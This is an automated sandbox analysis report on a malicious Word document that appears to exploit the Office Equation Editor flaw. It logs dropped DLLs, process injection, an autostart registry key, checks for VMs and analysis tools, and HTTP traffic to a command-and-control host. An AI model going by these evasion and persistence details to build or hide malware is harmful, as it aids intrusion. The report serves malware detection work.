Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:487031
Start time:19:13:34
Joe Sandbox Product:Cloud
Start date:24.01.2018
Overall analysis duration:0h 9m 10s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:DoNotOpen2.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection:MAL
Classification:mal96.evad.expl.troj.winDOC@7/13@7/2
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 43
  • Number of non-executed functions: 73
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Number of clicks 27
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, WMIADAP.exe, dllhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtEnumerateValueKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

StrategyScoreRangeReportingDetection
Threshold960 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


Exploits:

barindex
Office Equation Editor has been startedShow sources
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilitiesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: api.ipaddress.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49188 -> 209.126.119.177:80
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: a.b.1.dr

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /myip?format=txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipaddress.com
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: api.ipaddress.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /goix/nhbqad.asp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: application/jason,application/xml, q=0.9,*/*, q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-USCookie: 339hndxz=0wEEgqeI/L2qQmlVILDcCEjSuUvCsdzViNvvozbedxbAdA==; o49jg=zWVEEy8HHngAYbc+1rE0gJkrvAStoctjYgNpv4k6Szt9NkBBW93Ico9ieReFMojFzEeoAHCYHUFDrRQsvDbgYVM2KqbYbWq/OaEJQ5mDN6c=; 5f51il=InuyYTmulipC/qjau0zml1Nu7+ym09aui/5ksuwxMGq7sY44kB6xGZGq/lwuTsKXbhsr7wKboki43IbVzk8H3Si3N/B0rCRkIuwEFKiK8ys=;Host: 3.sj2xp1.paj.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Length: 3394
Urls found in memory or binary dataShow sources
Source: WINWORD.EXEString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.doc
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docE
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/DoNotOpen2.docO
Source: explorer.exeString found in binary or memory: file:///C:/Users/user/Documents
Source: explorer.exeString found in binary or memory: file:///C:/Users/user/Documentsrs
Source: iexplore.exeString found in binary or memory: http://
Source: iexplore.exeString found in binary or memory: http://%s
Source: iexplore.exeString found in binary or memory: http://%sConnectType
Source: iexplore.exeString found in binary or memory: http://103.236.150.14
Source: iexplore.exeString found in binary or memory: http://103.236.150.14192.168.1.16
Source: iexplore.exeString found in binary or memory: http://api.ipaddress.com/myip?format=txt
Source: iexplore.exeString found in binary or memory: http://api.ipaddress.com/myip?format=txt1
Source: iexplore.exeString found in binary or memory: http://https://:
Source: iexplore.exeString found in binary or memory: http://https://Try
Source: WINWORD.EXEString found in binary or memory: http://schemas.openx
Source: WINWORD.EXEString found in binary or memory: http://schemas.openxDV
Source: WINWORD.EXEString found in binary or memory: http://schemas.openxmlformat
Source: WINWORD.EXEString found in binary or memory: http://schemas.openxmlformatDV
Source: explorer.exeString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: WINWORD.EXEString found in binary or memory: http://www.
Source: explorer.exeString found in binary or memory: http://www.%s.comPA
Source: WINWORD.EXEString found in binary or memory: http://www.msnusers.com
Source: iexplore.exeString found in binary or memory: https://
Source: iexplore.exeString found in binary or memory: https://%s
Source: iexplore.exeString found in binary or memory: https://%sTry
Source: explorer.exeString found in binary or memory: https://en.wikipedia.org/wiki/XSLT/Muenchian_grouping
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com
Source: unknownDNS query: name: api.ipaddress.com

Boot Survival:

barindex
Creates an autostart registry keyShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD
Creates an autostart registry key pointing to binary in C:\WindowsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeRegistry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run IAStorD

Remote Access Functionality:

barindex
Contains functionality to launch a control a shell (cmd.exe)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: \cmd.exe /c 3_2_00515486

Stealing of Sensitive Information:

barindex
Searches for user specific document filesShow sources
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\Public\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents
Source: C:\Windows\explorer.exeKey value created or modified: C:\Users\user\Documents\QLSSZNHVJI

Persistence and Installation Behavior:

barindex
Contains functionality to read ini properties file for application configurationShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005114F8 memset,memset,memset,SHGetSpecialFolderPathW,___swprintf_l,GetPrivateProfileStringW,memset,memset,_wfopen,fgetws,wcsstr,wcsstr,_wtoi,feof,fclose,___swprintf_l,3_2_005114F8
Drops PE filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\a.b
Drops files with a non-matching file extension (content does not match file extension)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\a.b

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B34A3 push ecx; ret 2_2_617B34B6
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B3329 push ecx; ret 2_2_617B333C

System Summary:

barindex
Reads the Windows registered owner settingsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Uses Rich Edit ControlsShow sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\system32\MsftEdit.dll
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to development resourcesShow sources
Source: iexplore.exeBinary or memory string: 3.vbP.v
Classification labelShow sources
Source: classification engineClassification label: mal96.evad.expl.troj.winDOC@7/13@7/2
Contains functionality to check free disk spaceShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00516D52 GetModuleHandleW,GetProcAddress,GetTempPathW,GetDiskFreeSpaceExW,3_2_00516D52
Contains functionality to enum processes or threadsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2A05 CreateToolhelp32Snapshot,memset,memset,Process32FirstW,___swprintf_l,Process32NextW,CloseHandle,3_2_004F2A05
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$NotOpen2.doc
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVR12AE.tmp
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the Windows registered organization settingsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\DoNotOpen2.doc
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Windows\system32\rundll32.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Caches\NavShExt.dll,Setting
Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{35786D3C-B075-49b9-88DD-029876E11C01}\InProcServer32
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: NavShExt.dll.3.drStatic PE information: Section: .data ZLIB complexity 0.998944256757
Detected potential crypto functionShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D2_2_617B223D
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F13F53_2_004F13F5
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00513ABC3_2_00513ABC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005193613_2_00519361
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005199583_2_00519958
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005186ED3_2_005186ED
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_005195913_2_00519591
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00518EF83_2_00518EF8
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: String function: 00517FBE appears 69 times
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\a.b

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: iexplore.exe, explorer.exeBinary or memory string: Progman
Source: iexplore.exe, explorer.exeBinary or memory string: Program Manager
Source: iexplore.exe, explorer.exeBinary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Contains functionality to inject code into remote processesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to inject threads in other processesShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D

Anti Debugging:

barindex
Contains functionality to register its own exception handlerShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B2860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_617B2860
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F32A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_004F32A0
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_0051A460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0051A460
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXESystem information queried: KernelDebuggerInformation
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXECode function: 2_2_617B223D Setting,IsDebuggerPresent,CreateMutexA,GetLastError,CloseHandle,CloseHandle,memset,SHGetSpecialFolderPathA,memset,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,CreateProcessA,memset,GetModuleFileNameA,GetProcAddress,GetProcAddress,VirtualAllocEx,WriteProcessMemory,GetProcAddress,CreateRemoteThread,WaitForSingleObject,WaitForSingleObject,GetExitCodeThread,CreateRemoteThread,WaitForSingleObject,VirtualFreeEx,CloseHandle,2_2_617B223D
Contains functionality to dynamically determine API callsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517143 GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,GetUserNameA,MultiByteToWideChar,WideCharToMultiByte,ConvertSidToStringSidA,3_2_00517143

Malware Analysis System Evasion:

barindex
Contains functionality to query system informationShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_00517535 GetSystemInfo,3_2_00517535
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: iexplore.exeBinary or memory string: vmtools.exe
Source: iexplore.exeBinary or memory string: SYSTEM\ControlSet001\services\Disk\Enum0x3A RegOpenKeyExW Disk Failed-%d0vmwareqemuvboxvirtualhdSoftware\CommViewSoftware\eEye Digital SecuritySoftware\Win SnifferSoftware\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs\APIS32Software\Syser SoftSoftware\Classes\Folder\shell\sandboxSoftware\Classes\*\shell\sandboxSYSTEM\CurrentControlSet\Services\IRIS5SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WiresharkSOFTWARE\ZxSnifferSYSTEM\CurrentControlSet\Services\VBoxGuestSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Oracle VM VirtualBox Guest AdditionsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSandboxie%svboxtray.exevboxservice.exevmwareuser.exevmwaretray.exevmupgradehelper.exevmtoolsd.exevmacthlp.exevmtools.exeirise.exeIrisSvc.exewireshark.exeZxSniffer.exeRegshot.exeollydbg.exewindbg.exePEBrowseDbg.exeSyser.exeSandboxieRpcSs.exeSandboxieDcomLaunch.exe%02X%02X%02X%02X%02X%02X 000569000C29001C1400505600155D00163E080027H
Source: iexplore.exeBinary or memory string: SYSTEM\CurrentControlSet\Services\VBoxGuest
Source: iexplore.exeBinary or memory string: vmware
Source: iexplore.exeBinary or memory string: vmwaretray.exe
Source: iexplore.exeBinary or memory string: vmwareuser.exe
Source: iexplore.exeBinary or memory string: vmtoolsd.exe
Source: iexplore.exeBinary or memory string: vboxservice.exe
Source: iexplore.exeBinary or memory string: vboxtray.exe
Contains functionality to query network adapater informationShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,___swprintf_l,realloc,___swprintf_l,___swprintf_l,realloc,___swprintf_l,realloc,___swprintf_l,??3@YAXPAX@Z,3_2_005177AB
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514B82
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: ??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,??3@YAXPAX@Z,3_2_00514AAC
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 816
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDropped PE file which has not been started: C:\Users\user~1\AppData\Local\Temp\a.b
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3440Thread sleep time: -60000s >= -60000s
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3440Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 3540Thread sleep time: -180000s >= -60000s
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3536Thread sleep time: -60000s >= -60000s
Contains functionality to detect sandboxes (MAC address check)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F2FA1 ??2@YAPAXI@Z,memset,GetAdaptersInfo,??3@YAXPAX@Z,??2@YAPAXI@Z,GetAdaptersInfo,memset,___swprintf_l,??3@YAXPAX@Z,strstr,strstr,strstr,strstr,strstr,strstr,strstr,3_2_004F2FA1
Contains functionality to detect sandboxes (registry check)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F28FC RegOpenKeyExW,RegOpenKeyExW,RegCloseKey,RegOpenKeyExW,RegCloseKey,3_2_004F28FC
Contains functionality to detect virtual machines (IN, VMware)Show sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 3_2_004F278F in eax, dx3_2_004F278F
Tries to detect sandboxes and other dynamic analysis tools (process name)Show sources
Source: iexplore.exeBinary or memory string: WINDBG.EXE
Source: iexplore.exeBinary or memory string: IRISE.EXE
Source: iexplore.exeBinary or memory string: SANDBOXIERPCSS.EXE
Source: iexplore.exeBinary or memory string: WIRESHARK.EXE
Source: iexplore.exeBinary or memory string: IRISSVC.EXE
Source: iexplore.exeBinary or memory string: ZXSNIFFER.EXE
Source: iexplore.exeBinary or memory string: PEBROWSEDBG.EXE
Source: iexplore.exeBinary or memory string: SYSER.EXE
Source: iexplore.exeBinary or memory string: OLLYDBG.EXE
Source: iexplore.exeBinary or memory string: SANDBOXIEDCOMLAUNCH.EXE
Source: iexplore.exeBinary or memory string: REGSHOT.EXE
Tries to detect virtual machinesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: vboxtray.exe vboxservice.exe vboxservice.exe vmwareuser.exe vmwaretray.exe vmtoolsd.exe vmtools.exe 3_2_004F2A05
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: vmware qemu qemu vbox 3_2_004F27E5

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
